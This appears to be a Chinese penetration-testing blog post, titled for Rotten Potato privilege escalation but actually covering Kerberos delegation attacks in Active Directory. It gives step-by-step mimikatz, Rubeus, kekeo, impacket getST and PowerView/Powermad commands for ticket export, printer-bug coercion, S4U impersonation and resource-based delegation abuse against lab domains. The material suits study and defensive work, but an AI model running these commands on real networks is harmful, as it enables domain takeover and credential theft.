

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/b6.png">
  <link rel="icon" type="image/png" href="/img/b6.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="John Doe">
  <meta name="keywords" content="">
  <title>烂番茄提权 - Gr3yy&#39;s Blog</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10.4.0/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"gr3yyy123.github.io","root":"/","version":"1.8.7","typing":{"enable":true,"typeSpeed":90,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"onlypost":false},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null}}};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.3.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>Gr3yy's B1og</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                Home
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                Archives
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                Categories
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                Tags
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                About
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                Links
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" href="javascript:">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/default.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="烂番茄提权">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2021-02-05 08:00" pubdate>
        February 5, 2021 am
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      1.7k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      21
       分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">烂番茄提权</h1>
            
            <div class="markdown-body">
              <h1 id="烂番茄提权"><a href="#烂番茄提权" class="headerlink" title="烂番茄提权"></a>烂番茄提权</h1><h2 id="Kerberos委派攻击"><a href="#Kerberos委派攻击" class="headerlink" title="Kerberos委派攻击"></a>Kerberos委派攻击</h2><p>域委派是指将域内用户的权限委派给服务账号，使得服务账号能以用户的权限在域内展开活动。</p>
<ul>
<li><p>使用场景：</p>
<p>例如 <code>用户A</code> 需要访问 <code>服务用户B</code> 提供的 <code>http</code> 服务，但是B的http服务调用了 <code>用户C</code> 的 <code>mssql</code> 服务，这个时候如果B设置了委派属性，B可以A的身份委访问C的服务。</p>
</li>
</ul>
<h3 id="非约束委派"><a href="#非约束委派" class="headerlink" title="非约束委派"></a>非约束委派</h3><p>机器用户和服务用户默认可开启委派，非约束委派顾名思义即为通过其可委派任何服务。当用户请求该账户时，会发送自己的TGT，并保存在该服务账户的内存中，该账户即可通过此票据以用户的身份请求访问任何服务。</p>
<figure class="highlight css"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs css">* 域控：08<span class="hljs-selector-tag">r2</span> <br>* 用户: <span class="hljs-selector-tag">administrator</span><br>* 机器账户：<span class="hljs-selector-tag">km2008</span><br><br>    1. <span class="hljs-selector-tag">km2008</span> 在 <span class="hljs-selector-tag">adsiedit</span><span class="hljs-selector-class">.msc</span> 中科打开委派功能<br>    2. 以 <span class="hljs-selector-tag">administrator</span> 身份通过 <span class="hljs-selector-tag">winrm</span> 或 <span class="hljs-selector-tag">mssql</span> 连接 <span class="hljs-selector-tag">km2008</span><br>    3. 通过<span class="hljs-selector-tag">mimikatz</span>到处域管的票据<br>        <span class="hljs-selector-tag">privilege</span><span class="hljs-selector-pseudo">::debug</span> <br>        <span class="hljs-selector-tag">sekurlsa</span><span class="hljs-selector-pseudo">::tickets</span> /<span class="hljs-selector-tag">export</span><br>    4. 通过<span class="hljs-selector-tag">mimikatz</span>将票据注入到内存<br>        <span class="hljs-selector-tag">kerberos</span><span class="hljs-selector-pseudo">::ptt</span> <span class="hljs-selector-attr">[0;1622d8]</span><span class="hljs-selector-tag">-2-0-60a00000-Administrator</span><span class="hljs-keyword">@krbtgt-QIYOU</span>.COM.kirbi<br>    <span class="hljs-number">5</span>.  我们就可以在km2008上以域管的身份访问域控。(域控要用主机名或FQDN)<br></code></pre></td></tr></table></figure>
<p>winrm远程执行命令：</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">Windows</span> Server <span class="hljs-number">2012</span>及以上默认是开启WinRM服务的，Windows Server <span class="hljs-number">2008</span> R<span class="hljs-number">2</span>需要winrm quickconfig -q来启动WinRM服务，还要注意一点就是这条命令运行后会自动添加防火墙策略，防火墙默认会放行<span class="hljs-number">5985</span>端口的。<br></code></pre></td></tr></table></figure>
<h4 id="非约束委派＋打印机"><a href="#非约束委派＋打印机" class="headerlink" title="非约束委派＋打印机"></a>非约束委派＋打印机</h4><p>非约束委派需要用户主动连接，因此稍显鸡肋，但是我们可以通过 windows 的远程打印服务，强制运行spooler.exe的机器对我们选择的目标进行身份验证。</p>
<p>poc: <a target="_blank" rel="noopener" href="https://github.com/leechristensen/SpoolSample">https://github.com/leechristensen/SpoolSample</a></p>
<figure class="highlight smali"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs smali">* 域控：dm <br>* 用户: administrator<br>* 机器账户：km2008<br><br>    1. 现在我们拥有了km2008机器的本地管理员控制权，且其可以开启委派功能。<br>    2. 运行spoolsample.exe ：<br>        &gt; spoolsample.exe dm km2008<br>    3. 使用 Rubeus 监听本地：<br>        &gt; Rubeus.exe<span class="hljs-built_in"> monitor </span>/interval:1 /filteruser:dms$<br>    4. Rubeus可直接将捕获到的base64编码的证书导入内存<br>        &gt; Rubeus.exe ptt /ticket:base64<br>    5. mimikatz导出后就如同上面的操作了<br></code></pre></td></tr></table></figure>
<h3 id="约束委派"><a href="#约束委派" class="headerlink" title="约束委派"></a>约束委派</h3><p>顾名思义，被委派用户不能随意访问服务，只能访问被限定的服务内容。委派时保留st1而不是tgt给账户，st1包含用户授权信息但不允许其代表用户访问任意其他服务。</p>
<p>微软为保证委派的安全性引入S4U协议，该协议支持两个扩展：S4U2self、S4U2proxy。**<em>2self代表自身请求代表自身的st、2proxy代表代替用户请求代表用户的st**</em>。约束委派限制了2proxy的范围。</p>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20200207103902-002e844c-4953-1.png" srcset="/img/loading.gif" alt="img"></p>
<p>其中步骤1-4代表 <code>S4U2Self</code> 请求的过程，步骤5-10代表 <code>S4U2proxy</code>的请求过程</p>
<h4 id="约束委派的利用"><a href="#约束委派的利用" class="headerlink" title="约束委派的利用"></a>约束委派的利用</h4><h5 id="常规利用"><a href="#常规利用" class="headerlink" title="常规利用"></a>常规利用</h5><ul>
<li><p>利用结果很像是白银票据，但是并不需要直接获得想要请求的服务的hash</p>
</li>
<li><p>通过服务用户的明文或者ntlm，伪造用户发起s4u请求，伪装成任意用户访问被委派的服务。</p>
  <figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs bash">利用工具：kekeo.exe<br>条件：1.服务用户的明文or哈希<br>   2.委派权限<br><br>1. 通过服务用户的口令请求tgt<br>&gt; tgt::ask /user:fuwu /domain:test.local /password:password <br><span class="hljs-comment"># 将会在目录生成票据</span><br>2. 以administrator身份请求对其他服务的st（服务票据）<br>&gt; tgs::s4u /tgt:TGT_fuwu@TEST.LOCAL_krbtgt~test.local@TEST.LOCAL.kirbi /user:Administrator@test.local /service:cifs/dm08.test.local<br>3. 导入st<br>&gt; kerberos::ptt TGS_Administrator@test.local@TEST.LOCAL_cifs~dm08.test.local@TEST.LOCAL.kirbi<br></code></pre></td></tr></table></figure>
<h5 id="约束委派加黄金票据"><a href="#约束委派加黄金票据" class="headerlink" title="约束委派加黄金票据"></a>约束委派加黄金票据</h5></li>
<li><p>通过将被委派对象设置成krbtgt，可以达成和黄金票据一样的效果（同理，就和获得了krbtgt的hash可以制作金票一样，本身就是白银票据的效果）</p>
</li>
<li><p>可以用<code>impacket</code>系列的<code>getST</code>向KDC请求administrator的TGT</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs bash">getST.exe -dc-ip 192.168.141.145 -spn krbtgt/test.local -impersonate Administrator test.local/fuwu:password<br><br><span class="hljs-comment"># -impersonate：表示伪造用户</span><br><span class="hljs-comment"># -spn：表示我们要委派的服务的spn，这里是TGS</span><br><span class="hljs-comment"># -dc-ip：域控ip</span><br></code></pre></td></tr></table></figure></li>
<li><p>执行成功会生成一个域控的缓存文件，使用mimikatz的ptc将其导入</p>
<figure class="highlight css"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs css"><span class="hljs-selector-tag">kerberos</span><span class="hljs-selector-pseudo">::ptc</span> <span class="hljs-selector-tag">Administrator</span><span class="hljs-selector-class">.cache</span><br></code></pre></td></tr></table></figure>
<h3 id="基于资源的约束委派"><a href="#基于资源的约束委派" class="headerlink" title="基于资源的约束委派"></a>基于资源的约束委派</h3></li>
</ul>
<p><img src="https://nosec.org/avatar/uploads/attach/image/a8f21c017a3d8852dbc8a2510f6fefc1/aa.png" srcset="/img/loading.gif" alt="aa.png"></p>
<ul>
<li>不再需要域管理员权限去设置相关属性。基于资源的约束委派把设置委派的权限赋予了机器自身，既机器自己可以决定谁可以被委派来控制我。也就是说机器自身可以直接在自己账户上配置msDS-AllowedToActOnBehalfOfOtherIdentity属性来设置RBCD。</li>
<li>就算S4U2Self返回的票据不可转发（可不可以转发由TrustedToAuthenticationForDelegation决定），S4U2Proxy也是可以成功，并且S4U2Proxy返回的票据总是可转发。</li>
<li>利用条件：简单来说就是你获得的用户对该主机的属性具有写权限，那么这个用户就可以对该主机进行攻击。（获取机器的system权限）</li>
</ul>
<h4 id="基于资源的约束委派的利用"><a href="#基于资源的约束委派的利用" class="headerlink" title="基于资源的约束委派的利用"></a>基于资源的约束委派的利用</h4><p>还是利用之前的例子来做说明：</p>
<ul>
<li>目标机器：vul.test.local</li>
<li>用户：test.local\user1（对目标机器有写权限 ）</li>
</ul>
<p>利用过程如下：</p>
<ul>
<li><p>查看用户权限，利用harmj0y的<a target="_blank" rel="noopener" href="https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993">PowerView</a></p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs powershell"><span class="hljs-built_in">Get-DomainUser</span> <span class="hljs-literal">-Identity</span> user1 <span class="hljs-literal">-Properties</span> objectsid<br><span class="hljs-comment"># 获取用户的sid</span><br><span class="hljs-built_in">Get-DomainObjectAcl</span> <span class="hljs-literal">-Identity</span> vul | ?&#123;<span class="hljs-variable">$_</span>.SecurityIdentifier <span class="hljs-operator">-match</span> <span class="hljs-string">&quot;S-1-5-21-662417213-3583657854-423750704-1001&quot;</span>&#125;<br><span class="hljs-comment"># 根据sid查询用户对机器的权限</span><br></code></pre></td></tr></table></figure>
<p><code>GenericAll、GenericWrite、WriteProperty、WriteDacl</code> 等权限可修改机器属性</p>
</li>
<li><p>创建一个机器用户，使用<a target="_blank" rel="noopener" href="https://github.com/Kevin-Robertson/Powermad">Powermad</a></p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs powershell"><span class="hljs-built_in">New-MachineAccount</span> <span class="hljs-literal">-MachineAccount</span> evilsystem <span class="hljs-literal">-Password</span> <span class="hljs-variable">$</span>(<span class="hljs-built_in">ConvertTo-SecureString</span> <span class="hljs-string">&quot;fuwu&quot;</span> <span class="hljs-literal">-AsPlainText</span> <span class="hljs-literal">-Force</span>)<br></code></pre></td></tr></table></figure>
<p>创建一个计算机用户<code>fuwusystem</code></p>
</li>
<li><p>配置fuwusystem到vul的基于资源约束的委派（PowerView）</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs powershell"><span class="hljs-variable">$SD</span> = <span class="hljs-built_in">New-Object</span> Security.AccessControl.RawSecurityDescriptor <span class="hljs-literal">-ArgumentList</span> <span class="hljs-string">&quot;O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-662417213-3583657854-423750704-1115)&quot;</span><br><span class="hljs-variable">$SDBytes</span> = <span class="hljs-built_in">New-Object</span> byte[] (<span class="hljs-variable">$SD</span>.BinaryLength)<br><span class="hljs-comment"># 生成代表属性值的字节型数组</span><br><span class="hljs-variable">$SD</span>.GetBinaryForm(<span class="hljs-variable">$SDBytes</span>, <span class="hljs-number">0</span>)<br><span class="hljs-built_in">Get-DomainComputer</span> vul| <span class="hljs-built_in">Set-DomainObject</span> <span class="hljs-literal">-Set</span> <span class="hljs-selector-tag">@</span>&#123;<span class="hljs-string">&#x27;msds-allowedtoactonbehalfofotheridentity&#x27;</span>=<span class="hljs-variable">$SDBytes</span>&#125; <span class="hljs-literal">-Verbose</span><br><span class="hljs-comment"># 设置属性值</span><br></code></pre></td></tr></table></figure></li>
<li><p>验证是否成功添加</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs powershell"><span class="hljs-built_in">Get-DomainComputer</span> vul <span class="hljs-literal">-Properties</span> msds<span class="hljs-literal">-allowedtoactonbehalfofotheridentity</span><br></code></pre></td></tr></table></figure></li>
<li><p>清除<code>msds-allowedtoactonbehalfofotheridentity</code>属性的值</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs powershell"><span class="hljs-built_in">Set-DomainObject</span> vul <span class="hljs-literal">-Clear</span> <span class="hljs-string">&#x27;msds-allowedtoactonbehalfofotheridentity&#x27;</span> <span class="hljs-literal">-Verbose</span><br></code></pre></td></tr></table></figure></li>
<li><p>也可以直接通过AD模块修改（server2012及以上）</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs powershell"><span class="hljs-built_in">Set-ADComputer</span> vul <span class="hljs-literal">-PrincipalsAllowedToDelegateToAccount</span> fuwusystem<span class="hljs-variable">$</span><br><span class="hljs-built_in">Get-ADComputer</span> vul <span class="hljs-literal">-Properties</span> PrincipalsAllowedToDelegateToAccount<br></code></pre></td></tr></table></figure>
<ul>
<li><p>该模块仅在域控安装，可将域控的 <code>Microsoft.ActiveDirectory.Management.dll</code> 文件导出</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs powershell"><span class="hljs-built_in">import-module</span> Microsoft.ActiveDirectory.Management.dll<br></code></pre></td></tr></table></figure></li>
</ul>
</li>
<li><p>之后的攻击步骤与约束委派相同</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">getST.exe -dc-ip 192.168.141.145 -spn cifs/dm2008 -impersonate Administrator test.local/fuwusystem$:password<br></code></pre></td></tr></table></figure>
<p><img src="C:\Users\Mi\AppData\Roaming\Typora\typora-user-images\image-20210205074422901.png" srcset="/img/loading.gif" alt="image-20210205074422901"></p>
</li>
</ul>
<h4 id="设置了不可委派的用户的利用"><a href="#设置了不可委派的用户的利用" class="headerlink" title="设置了不可委派的用户的利用"></a>设置了不可委派的用户的利用</h4><p>域内高权限用户是默认不可被委派的（例如adminsitrator）即s4u2self不可转发，s4u2proxy转发会失败</p>
<p>国外的师傅分析了原因是S4U2self返回的票据缺失SPN，那只需要补全即可</p>
<p>Rubeus实现了这个功能：</p>
<ul>
<li><p>先将s4u2self票据导出为test.kirbi</p>
</li>
<li><p>补全spn</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs awk">Rubeus.exe tgssub <span class="hljs-regexp">/ticket:test.kirbi /</span>altservice:cifs<span class="hljs-regexp">/vul /</span>ptt<br>Rubeus.exe tgssub <span class="hljs-regexp">/ticket:test.kirbi /</span>altservice:host<span class="hljs-regexp">/vul /</span>ptt<br></code></pre></td></tr></table></figure>


</li>
</ul>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/AD/">AD</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/AD/">AD</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！</p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2021/02/03/tips/">
                        <span class="hidden-mobile">一些日常小tips</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;TOC</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  

  

  
</footer>

<!-- SCRIPTS -->

  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/js/bootstrap.min.js" ></script>
<script  src="/js/debouncer.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/lazyload.js" ></script>
  



  



  <script  src="https://cdn.jsdelivr.net/npm/tocbot@4.12.0/dist/tocbot.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4.3.0/anchor.min.js" ></script>



  <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2.0.6/dist/clipboard.min.js" ></script>






  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2.0.11/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    (function () {
      var path = "/local-search.xml";
      var inputArea = document.querySelector("#local-search-input");
      inputArea.onclick = function () {
        searchFunc(path, 'local-search-input', 'local-search-result');
        this.onclick = null
      }
    })()
  </script>















<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>



</body>
</html>
